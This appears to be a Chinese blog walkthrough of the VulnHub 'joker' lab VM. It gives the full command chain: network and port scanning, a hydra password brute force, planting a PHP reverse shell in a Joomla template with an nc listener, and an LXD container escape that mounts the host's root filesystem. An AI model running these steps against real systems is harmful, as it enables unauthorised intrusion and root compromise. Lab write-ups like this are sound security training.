本周实践的是vulnhub的joker镜像,
下载地址,https://download.vulnhub.com/ha/joker.zip,
用workstation导入成功,
做地址扫描,sudo netdiscover -r 192.168.220.0/24,
获取到靶机地址是192.168.220.162,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.220.162,
发现靶机有80和8080端口的http服务,
浏览器访问http://192.168.220.162:8080,
发现需要http basic认证,
以joker为用户名进行密码暴破,
hydra -l joker -P /usr/share/wordlists/rockyou.txt -u -e ns http-get://192.168.220.162:8080,
获取到密码hannah,
登录,发现站点是Joomla,
访问后台,http://192.168.220.162:8080/administrator,
用joomla/joomla登录,
浏览到模板beez3的index.php,
把kali攻击机本地的反弹shell代码替换上去,
cat /usr/share/webshells/php/php-reverse-shell.php,
kali攻击机上开启反弹shell监听,nc -lvp 4444,
浏览器访问http://192.168.220.162:8080/templates/beez3/index.php,
获取到反弹shell,改成交互式shell,
python3 -c 'import pty;pty.spawn("/bin/bash")',
发现当前账户有lxd权限,
在kali攻击机上下载容器镜像,
git clone https://github.com/saghul/lxd-alpine-builder.git,
cd lxd-alpine-builder,
kali攻击机上开启http下载服务,python2 -m SimpleHTTPServer,
靶机上进入临时目录,cd /tmp,
下载容器镜像,wget http://192.168.220.157:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz,
导入容器镜像,lxc image import alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage,
查看,lxc image list,
初始化,lxc init myimage ignite -c security.privileged=true,
配置挂载宿主机根目录,lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true,
启动容器实例,lxc start ignite,
进入容器实例,lxc exec ignite /bin/sh,
进入挂载目录,cd /mnt/root/root,
查看内容,cat final.txt,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之joker的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论